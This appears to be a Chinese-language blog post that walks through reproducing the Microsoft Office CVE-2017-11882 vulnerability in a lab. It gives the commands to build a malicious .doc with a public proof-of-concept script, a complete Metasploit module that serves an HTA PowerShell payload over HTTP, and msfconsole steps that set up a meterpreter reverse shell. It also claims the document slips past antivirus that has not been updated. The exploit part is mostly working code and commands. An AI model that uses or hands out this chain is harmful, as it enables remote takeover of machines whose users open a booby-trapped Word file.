Office CVE-2017-11882复现


这两天,office又出名了,CVE-2017-11882成了圈里关注的热点,今年office爆出好几个漏洞,从CVE-2017-0199、CVE-2017-8570到现在的CVE-2017-11882,exp也是越来越简单粗暴。

下面,我也来蹭波热度。


Step1:万年计算器POC

POC GitHub:可以使用国外出现的第一份poc:https://github.com/embedi/CVE-2017-11882,不过已经停止更新了。这里我使用:https://github.com/Ridter/CVE-2017-11882。
使用clone或直接下载zip都行:

1
git clone https://github.com/Ridter/CVE-2017-11882.git

进入项目文件

1
2
root@Kali:~/hackhub/CVE-2017-11882# python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc
[*] Done ! output file --> calc.doc

用靶机打开



至此,以验证该漏洞存在。想在0199的时候还需要自己避免交互,现在poc直接帮你解决。。。


Step2:Get Shell

1、还是使用上一步的脚本

1
2
root@Kali:~/hackhub/CVE-2017-11882# python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.231:8080/abc" -o test.doc
[*] Done ! output file --> test.doc

先把doc文档放到靶机。

2、上msf
首先添加利用脚本,我机子msf exp的路径是/usr/share/metasploit-framework/modules/exploits/windows,可以在这目录下新建一个文件夹。
将下面的脚本写入到PS_shell.rb。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office Payload Delivery',
'Description' => %q{
This module generates an command to place within
a word document, that when executed, will retrieve a HTA payload
via HTTP from an web server. Currently have not figured out how
to generate a doc.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Automatic', {} ],
],
'DefaultTarget' => 0,
))
end

def on_request_uri(cli, _request)
print_status("Delivering payload")
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win '}
)
send_response(cli, data, 'Content-Type' => 'application/hta')
end


def primer
url = get_uri
print_status("Place the following DDE in an MS document:")
print_line("mshta.exe \"#{url}\"")
end
end

打开msf,执行msfconsole。进去后记得要 reload_all。选择PS_shell脚本,然后开启监听

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf > use exploit/windows/new-exps/PS_shell 
msf exploit(PS_shell) >
msf exploit(PS_shell) >
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.1.231
lhost => 192.168.1.231
msf exploit(PS_shell) > set uripath abc
uripath => abc
msf exploit(PS_shell) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.231:4444
[*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://192.168.1.231:8080/abc
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.231:8080/abc"


这里,Msf官方已经出了office_ms17-11882.rb的利用脚本。链接:
office_ms17-11882.rb,我还没有试,不过大家可以尝试。

回到靶机,打开test.doc。



此时,我们可以发现,shell已经反弹回来了.





至此,已经 get shell。


免杀版本

暂无,但是如果杀毒没有更新,还是能bypass的。。。

参考链接:


http://www.cnblogs.com/Hi-blog/p/7878054.html


http://payloads.online/archivers/2017-11-22/1

# CVE, office

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×